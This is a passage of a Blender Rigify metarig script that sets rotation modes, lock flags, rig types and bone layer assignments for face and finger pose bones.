pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_palm.01.R']]
pbone.rigify_type = 'limbs.super_palm'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['nose.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['chin.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['ear.L.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['ear.R.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.B.L.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.T.L.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.B.R.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.T.R.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['forehead.L.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['forehead.R.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['nose.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['nose.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['tongue.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_pinky.01.L']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['f_ring.01.L']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['f_middle.01.L']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['f_index.01.L']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['f_pinky.01.R']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['f_ring.01.R']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['f_middle.01.R']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['f_index.01.R']]
pbone.rigify_type = 'limbs.simple_tentacle'
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
try:
pbone.rigify_parameters.tweak_layers = [False, False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
except AttributeError:
pass
pbone = obj.pose.bones[bones['nose.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['ear.L.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['ear.R.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.B.L.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.T.L.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['brow.B.R.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.T.R.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['temple.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['temple.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['nose.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['nose.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_pinky.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_ring.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_middle.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_index.02.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_pinky.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_ring.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_middle.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_index.02.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['nose.004']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['ear.L.004']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['ear.R.004']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.B.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.B.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_pinky.03.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_ring.03.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_middle.03.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_index.03.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_pinky.03.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_ring.03.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_middle.03.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['f_index.03.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [False, False, False, False, False, True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.B.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.B.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['jaw.R.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.B.L.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.B.R.002']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['chin.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['chin.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.B.L.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['lid.B.R.003']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['cheek.B.L']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['cheek.B.R']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
pbone.lock_rotation = (False, False, False)
pbone.lock_rotation_w = False
pbone.lock_scale = (False, False, False)
pbone.rotation_mode = 'QUATERNION'
pbone.bone.layers = [True, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False, False]
pbone = obj.pose.bones[bones['cheek.B.L.001']]
pbone.rigify_type = ''
pbone.lock_location = (False, False, False)
